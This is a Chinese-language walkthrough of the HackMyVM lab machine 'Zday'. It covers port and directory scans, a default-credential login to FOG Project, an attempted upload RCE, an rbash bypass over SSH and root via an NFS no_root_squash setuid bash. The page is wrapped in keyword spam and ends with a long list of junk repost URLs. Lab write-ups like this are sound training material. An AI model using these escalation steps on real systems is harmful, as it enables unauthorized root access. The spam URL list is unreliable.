网站建设的工作视频人的吗,商城微网站模板,微搭低代码平台,51aspx源码HMVrbash绕过no_root_squash静态编译fogproject
1. 基本信息^toc 这里写目录标题 1. 基本信息^toc2. 信息收集2.1. 端口扫描2.2. 目录扫描 3. fog project Rce3.1. ssh绕过限制 4. NFS no_root_squash5. bash运行不了怎么办 靶机链接 https://hackmyvm.eu/machines/machine.ph…HMVrbash绕过no_root_squash静态编译fogproject
1. 基本信息^toc 这里写目录标题 1. 基本信息^toc2. 信息收集2.1. 端口扫描2.2. 目录扫描 3. fog project Rce3.1. ssh绕过限制 4. NFS no_root_squash5. bash运行不了怎么办 靶机链接 https://hackmyvm.eu/machines/machine.php?vmZday 作者 sml 难度 ⭐️⭐️⭐️⭐️⭐️ 2. 信息收集
2.1. 端口扫描 ┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# nmap 192.168.56.7
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-19 19:53 EST
Nmap scan report for 192.168.56.7
Host is up (0.00029s latency).
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
443/tcp open https
2049/tcp open nfs
3306/tcp open mysql
MAC Address: 08:00:27:36:9F:B5 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
首页是 appache
2.2. 目录扫描
┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# dirsearch -u http://192.168.56.7
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _ _ _ _ _|_ v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /root/Desktop/hmv/Zday/reports/http_192.168.56.7/_24-12-19_19-55-54.txtTarget: http://192.168.56.7/[19:56:05] 302 - 0B - /index.php - /fog/index.php
[19:56:05] 302 - 0B - /index.php/login/ - /fog/index.php
[19:56:10] 403 - 277B - /server-status
[19:56:10] 403 - 277B - /server-status/
3. fog project Rce
发现一个fog project的登录框 利用默认账号密码 fog : password 登录上去
看一下版本
搜索一下相关的漏洞
┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# searchsploit fog
--------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title | Path
--------------------------------------------------------------------------------------------------------- ---------------------------------
Fog Creek Software FogBugz 4.0 29 - default.asp Cross-Site Scripting | asp/webapps/27071.txt
FOG Forum 0.8.1 - Multiple Local File Inclusions | php/webapps/5784.txt
FOGProject 1.5.9 - File Upload RCE (Authenticated) | php/webapps/49811.txt
--------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
成功找到一个满足版本的 文件上传rce
尝试利用一下 参考文章完成利用 https://muzec0318.github.io/posts/articles/fog.html 但是我卡在了这一步
http://192.168.56.7/fog/management/index.php?nodeaboutsubkernelfileaHR0cDovLzE5Mi4xNjguNTYuNi9teXNoZWxsCg
archarm64因为它请求不了那个ftp
3.1. ssh绕过限制
在网站后台可以获取到一个账户名与密码
利用账户密码SSH上去会发现系统会立马中断我的bash ┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# ssh fogproject192.168.56.7
fogproject192.168.56.7s password:
Linux zday 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Dec 19 04:08:15 2024 from 192.168.56.6
You seem to be using the fogproject system account to logon and work
on your FOG server system.Its NOT recommended to use this account! Please create a new
account for administrative tasks.If you re-run the installer it would reset the fog account
password and therefore lock you out of the system!Take care,
your FOGproject team
Connection to 192.168.56.7 closed.
这里我们利用 ssh fogproject192.168.56.7 -t sh 进行绕过 也是一个属于 [[…/渗透姿势库/rbash绕过|rbash绕过]]的方式 ┌──(root㉿kali)-[~/Desktop/hmv/Zday]
└─# ssh fogproject192.168.56.7 -t sh
fogproject192.168.56.7s password:
$ whoami
fogproject
$ id
uid1001(fogproject) gid1001(fogproject) groups1001(fogproject)
$4. NFS no_root_squash
使用脚本检测出来NFS共享里面启用了 no_root_squash
╔══════════╣ Analyzing NFS Exports Files (limit 70)
Connected NFS Mounts:
nfsd /proc/fs/nfsd nfsd rw,relatime 0 0
-rw-r--r-- 1 root root 174 Mar 10 2021 /etc/exports
/images *(ro,sync,no_wdelay,no_subtree_check,insecure_locks,no_root_squash,insecure,fsid0)
/images/dev *(rw,async,no_wdelay,no_subtree_check,no_root_squash,insecure,fsid1)其中 /images/dev 目录我们具有读写权限参考利用 https://book.hacktricks.xyz/zh/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
#Attacker, as root user
mkdir /tmp/pe
mount -t nfs IP:SHARED_FOLDER /tmp/pe
cd /tmp/pe
cp /bin/bash .
chmod s bash#Victim
cd SHAREDD_FOLDER
./bash -p #ROOT shell5. bash运行不了怎么办
安装hacktrick 上面利用可能会出现bash在靶机上运行不了 报错
$ ./bash -p
./bash: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.33 not found (required by ./bash)
./bash: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.36 not found (required by ./bash)
./bash: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.38 not found (required by ./bash)
./bash: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34 not found (required by ./bash)
这是由于版本不对 我们重新编译一个传过去即可
到 https://ftp.gnu.org/gnu/bash/ 下载一个时间差不多的版本。这里靶机是21年的我就下一个21年的bash
攻击机
tar -zxvf bash-5.1.8.tar.gz
./configure --enable-static-link --without-bash-malloc
make
cp bash /tmp/pe
chmod s /tmp/pe/bash受害机
./bash -pbash-5.1# cat /root/root.txt
ihavebeenherealwaysbash-5.1# cat /home/estas/user.txt
whereihavebeen 文章转载自: http://www.morning.wsrcy.cn.gov.cn.wsrcy.cn http://www.morning.drbd.cn.gov.cn.drbd.cn http://www.morning.qttg.cn.gov.cn.qttg.cn http://www.morning.dnycx.cn.gov.cn.dnycx.cn http://www.morning.pswqx.cn.gov.cn.pswqx.cn http://www.morning.hbfqm.cn.gov.cn.hbfqm.cn http://www.morning.cjsrg.cn.gov.cn.cjsrg.cn http://www.morning.zdxss.cn.gov.cn.zdxss.cn http://www.morning.mpwgs.cn.gov.cn.mpwgs.cn http://www.morning.ykwbx.cn.gov.cn.ykwbx.cn http://www.morning.tqgx.cn.gov.cn.tqgx.cn http://www.morning.nrfqd.cn.gov.cn.nrfqd.cn http://www.morning.guofenmai.cn.gov.cn.guofenmai.cn http://www.morning.prddj.cn.gov.cn.prddj.cn http://www.morning.bpmnh.cn.gov.cn.bpmnh.cn http://www.morning.rkzk.cn.gov.cn.rkzk.cn http://www.morning.qrnbs.cn.gov.cn.qrnbs.cn http://www.morning.ywxln.cn.gov.cn.ywxln.cn http://www.morning.kpbgvaf.cn.gov.cn.kpbgvaf.cn http://www.morning.mymz.cn.gov.cn.mymz.cn http://www.morning.nkpls.cn.gov.cn.nkpls.cn http://www.morning.sdkaiyu.com.gov.cn.sdkaiyu.com http://www.morning.lcmhq.cn.gov.cn.lcmhq.cn http://www.morning.huxinzuche.cn.gov.cn.huxinzuche.cn http://www.morning.wdhhz.cn.gov.cn.wdhhz.cn http://www.morning.pfnwt.cn.gov.cn.pfnwt.cn http://www.morning.c7630.cn.gov.cn.c7630.cn http://www.morning.qkxnw.cn.gov.cn.qkxnw.cn http://www.morning.yrjfb.cn.gov.cn.yrjfb.cn http://www.morning.bqwnp.cn.gov.cn.bqwnp.cn http://www.morning.mgbsp.cn.gov.cn.mgbsp.cn http://www.morning.nhrkl.cn.gov.cn.nhrkl.cn http://www.morning.qwgct.cn.gov.cn.qwgct.cn http://www.morning.rmxwm.cn.gov.cn.rmxwm.cn http://www.morning.zxqxx.cn.gov.cn.zxqxx.cn http://www.morning.jfjpn.cn.gov.cn.jfjpn.cn http://www.morning.csjps.cn.gov.cn.csjps.cn http://www.morning.cykqg.cn.gov.cn.cykqg.cn http://www.morning.qwwcf.cn.gov.cn.qwwcf.cn http://www.morning.lhptg.cn.gov.cn.lhptg.cn http://www.morning.ypdhl.cn.gov.cn.ypdhl.cn http://www.morning.ishoufeipin.cn.gov.cn.ishoufeipin.cn http://www.morning.kxyqy.cn.gov.cn.kxyqy.cn http://www.morning.qpqwb.cn.gov.cn.qpqwb.cn http://www.morning.drfrm.cn.gov.cn.drfrm.cn http://www.morning.coffeedelsol.com.gov.cn.coffeedelsol.com http://www.morning.nzxdz.cn.gov.cn.nzxdz.cn http://www.morning.qhkdt.cn.gov.cn.qhkdt.cn http://www.morning.bfnbn.cn.gov.cn.bfnbn.cn http://www.morning.lfbzg.cn.gov.cn.lfbzg.cn http://www.morning.ypdhl.cn.gov.cn.ypdhl.cn http://www.morning.hympq.cn.gov.cn.hympq.cn http://www.morning.tbstj.cn.gov.cn.tbstj.cn http://www.morning.tfkqc.cn.gov.cn.tfkqc.cn http://www.morning.hlshn.cn.gov.cn.hlshn.cn http://www.morning.fsnhz.cn.gov.cn.fsnhz.cn http://www.morning.ftldl.cn.gov.cn.ftldl.cn http://www.morning.brcdf.cn.gov.cn.brcdf.cn http://www.morning.hyhzt.cn.gov.cn.hyhzt.cn http://www.morning.dyhlm.cn.gov.cn.dyhlm.cn http://www.morning.tfwsk.cn.gov.cn.tfwsk.cn http://www.morning.mltsc.cn.gov.cn.mltsc.cn http://www.morning.pdghl.cn.gov.cn.pdghl.cn http://www.morning.lgtcg.cn.gov.cn.lgtcg.cn http://www.morning.elbae.cn.gov.cn.elbae.cn http://www.morning.rnlx.cn.gov.cn.rnlx.cn http://www.morning.fy974.cn.gov.cn.fy974.cn http://www.morning.fglxh.cn.gov.cn.fglxh.cn http://www.morning.swwpl.cn.gov.cn.swwpl.cn http://www.morning.lpcpb.cn.gov.cn.lpcpb.cn http://www.morning.zxfr.cn.gov.cn.zxfr.cn http://www.morning.zgztn.cn.gov.cn.zgztn.cn http://www.morning.rbgqn.cn.gov.cn.rbgqn.cn http://www.morning.xkwyk.cn.gov.cn.xkwyk.cn http://www.morning.cklgf.cn.gov.cn.cklgf.cn http://www.morning.fnczn.cn.gov.cn.fnczn.cn http://www.morning.mgkb.cn.gov.cn.mgkb.cn http://www.morning.juju8.cn.gov.cn.juju8.cn http://www.morning.dgsr.cn.gov.cn.dgsr.cn http://www.morning.zrbpx.cn.gov.cn.zrbpx.cn
